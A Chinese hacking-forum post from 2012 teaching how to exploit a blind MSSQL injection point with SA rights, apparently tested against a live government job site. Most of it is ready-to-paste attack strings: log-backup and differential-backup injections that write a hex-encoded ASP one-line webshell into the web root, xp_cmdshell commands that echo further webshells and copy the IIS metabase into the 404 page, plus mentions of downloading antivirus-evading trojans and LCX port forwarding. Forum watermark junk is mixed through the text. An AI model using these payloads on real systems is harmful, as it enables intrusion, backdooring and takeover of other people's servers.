中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]

作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————: e' H) x. a& u1 R& k" t
! N7 s, f2 Z# M, O& g  n& j
- _& w  s8 k0 s, l! z
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。# P( e/ ]5 y' `( U# V% w0 ^& G, R
, {" H8 @4 c* I, E  b
                                                                 ! G+ `1 ^- G0 W) v
                                                                 ( E3 M* ^0 ^% f6 O2 o
                                                                  论坛: http://www.90team.net/: u5 {  f" b+ s; d/ c1 y- j; W
1 _8 e1 j" X1 j: [' K- M3 {9 o
+ j! U5 x& P( F$ j% k# y6 ^2 a
( v$ ^% \) J5 W" ]$ r! F2 @
友情检测国家人才网
5 j0 p) U4 T6 u* _7 x7 \0 W
% j3 x; p  B; L3 h7 S: N8 [/ C
0 V* ^- A, _; D内容:MSSQL注入SA权限不显错模式下的入侵
' @% e. s' u& r  N- i% m7 a
" f1 }& \# X* W9 {) e. p9 p/ M  t( D. H" @, d
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。2 B% W7 c2 o* b; r( g

/ y" M  ?( H- C" j/ N& D& Z1 t2 P/ a我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。: K/ _, k9 F8 @6 L3 N0 M

8 D- ?, c1 k9 Y$ _" j1 |: K- Y
2 V8 R) X0 K7 v7 g# E5 E这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ A1 {* g& X% R; S* n3 f/ j$ J5 @! a, |) z" ]) n
思路:$ i$ M* r$ S: ?4 E# V4 t# E- A
# O+ |+ s. b" ]7 n2 R& y0 `
首先:: j' ]5 |% b, r
1 J$ b2 T' o) [( H% Z! }
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
! H" u; h7 m( F' u) o
+ L' L7 b7 c( K% W& o) M1.日志备份获得Webshell
2 C8 Z$ h. ^( @8 k$ i# g0 x) {' k
2.数据库差异备份获得Webshell3 c7 G) l  r- L7 T, k

% P$ U. z5 s2 X: ]; j4.直接下载免杀远控木马。1 k- D# h+ H) `6 K! m
, N3 T, M8 e8 ~3 q
5.直接下载LCX将服务器端口转发出来6 _* G, H' }' P5 M" Y0 [# T
' f- M% O+ N" t% j: Z/ d/ O
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
7 z2 Q/ f( x# A& p$ @9 E
+ U4 z$ p9 I9 t8 H2 A4 c& ]
1 f# x: S( b& h( E+ m# @
# ~, }6 A/ r9 W/ E; Y. C在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, $ X) a, p' d; f" U% K

* ~; s( ^: U  A1 Z我直接演示后面一个方法( C1 g# K: s1 h  w& c$ C: R, J
. J: z" ]  x% D  c8 d: L; C
- ~5 K0 k: D* N
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 8 K5 k2 C. \1 ]3 Q% D( B( y5 u$ V

8 ]' C) p* c& \9 W  c  U- q2 \. m2 j$ c8 q" K# Y4 ?
3 e" ^# e, |+ f$ f8 ]3 ?
$ ]/ V: i% b! {0 i- ?  m" U
◆日志备份:, M/ b9 _7 f. m" d+ r. {" `& S( V/ A% d  s
; B$ `9 i$ v, G6 B6 h! }% S
4 X0 B4 v, A( f" p
1. 进行初始备份- M7 ^3 Z$ O, \7 F
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--9 A6 v4 L( r* I2 m9 O
* U3 Z. Z% ]( M1 Z: Z3 o
2. 插入数据# g6 ^: T- i! F8 D  R" E: u) _
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--5 w1 N7 V' S7 W

9 W, }. k8 I7 p8 L0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>* n6 \6 T. x2 v* C
  
. O7 t7 {$ E0 D: M3. 备份并获得文件,删除临时表3 Z+ c2 ~! E$ w4 e2 ]
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
: U5 V. |2 U/ K) G# @9 @" ]$ B% k: W2 F% S: ?

; K+ |" a% ?" h4 \" i- Y9 W& H2 S3 g! P. ~1 _6 p$ k
◆数据库差异备份
% W1 q# H$ Y# d, I
' b5 o$ O3 R  a+ p" z0 Y# J8 S(1. 进行差异备份准备工作# a+ q* C3 K) T
5 g8 I" R" d/ D4 s0 j
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--, `. f' P* a4 c: R$ \4 n2 J

# j& n6 ]6 G! o$ v上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
! u% `- S! L6 Q3 @3 A. L& Q
5 {3 z6 }/ g4 N# S* `
: I) s- ~! `( I0 z& R(2. 将数据写入到数据库4 H2 {  h8 E' f" F- b9 F2 m/ u
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* D; S# {. Z* C# o2 ?
, e% \2 `4 H# O% S# z! B0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>* Z) t: x3 Q* |" d& [9 x
3 C# `. T; V- ~( D
3. 备份数据库并清理临时文件# V, v) @4 Q  H5 n: {, u9 }8 ]

7 ], }7 {. v. e+ H;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--( N$ p) U+ ?: }
7 [+ F0 C! N. z' M9 }
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 3 n3 k5 j" u6 X: k: _* G

% @+ M- K. u/ V. J( j% T) n, N3 a1 y; n- a% y# B( t
7 h! l& R- [6 ]) U" d' j3 X1 X
用^转义字符来写ASP(一句话木马)文件的方法:   
2 ~- X9 ]& ^, i% ?/ U/ E/ \1 s! x3 W4 T0 k2 v% b
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
! q' j% a0 p8 V! v7 p! M- B8 ~; u, u8 p
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
1 r" g$ r9 t& m6 {3 e7 ^5 [, \0 K) I# F9 ^- U
读取IIS配置信息获取web路径* W$ B- D2 F$ o& A8 C/ n7 u2 |/ e, H
$ d7 D& H) R6 r
       i# u6 z4 E2 B* A5 y4 [
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--1 W4 s$ {! M4 N
0 J6 S* c: N! w' Y, J3 b
执行命令
9 W. Z- {& x6 R( z8 c     9 i& N" f3 I4 I9 O! o- h7 c
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--! E$ p7 v6 q  r: Z! `

  \# N9 Q( V2 X, {  `8 o* l# X2 U# b) c; S2 n

8 E( t7 E6 {( t1 d8 L' T: n9 |" F' d. \( |6 X' R6 P

- [8 v9 N& q) j# i7 F& a' B
5 Z) D3 {! G9 F
8 [6 L4 A1 \' ~# D" |
0 B  w/ e4 H8 p; N+ V1 V  D
/ V5 H; g1 u: \3 p0 c
6 A2 o0 C$ w0 ?" F2 h
- d  z8 y0 z6 o$ X! _. @+ T* ^' a, |5 V6 U

- z/ a% I  R& U. Z, j! W$ ^! o2 f0 ?3 H
/ S6 r8 V. C( b! B) V" u( h' `
/ q6 ]; g) c, F! l5 u4 U0 T, O+ f
0 U; p# a, \1 y6 |+ L: D
- G5 t% K& B. F- C
. J  B" E0 Z" P# N% X

3 Q3 v! R& r. Y/ _  U
! v# V/ M% B; |; T2 P3 U# L% X1 Q$ L6 o5 X5 s. ]) O9 h

2 ]$ P1 b- Q* O/ P" U, J+ b* V5 h% I5 h! A4 R% v
, _  {9 S* O$ K4 B# t/ o2 J

9 Y8 r, r/ Z* X2 N8 A2 o1 J
* ?1 `9 k( k5 s# ^' c3 M9 O
$ ~8 v1 [, y* w* F6 l, m* G% U$ q
9 }+ ]4 J; X8 a# c( g* z. V# `+ ~  M: r& L

: l& p# t' p8 b4 u
' G. P% z' @: r4 k% y% l! J
; }9 m/ S9 e: ^9 D& s* L" D
9 I7 J# r. A3 x& f6 Z. D: L
1 @( S$ B  m, O: W+ G! J+ [* E1 ~
7 b: M0 d4 L' ~) P" \! t' o# ]7 y
3 E6 i1 l' q" n2 r6 p3 s- Y7 ^/ w3 i% A+ r* [

5 c( ~: D0 t, d3 }. E$ p. D# Z/ o( [4 C
7 u) ?. ^1 ]8 j  t# J7 X. [

9 o7 Z1 {8 Q: j9 X  f* A. |# }' j6 q% G) k0 l1 N

% l, o! O, n$ x9 C1 e2 Y$ V  l
% _% K8 b% ~0 A1 n( ]" [" r
' D* x0 T4 d2 M! q6 f& g% T: e# U! ]$ w1 w

1 h: z8 U8 U& ?' T, M: w




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2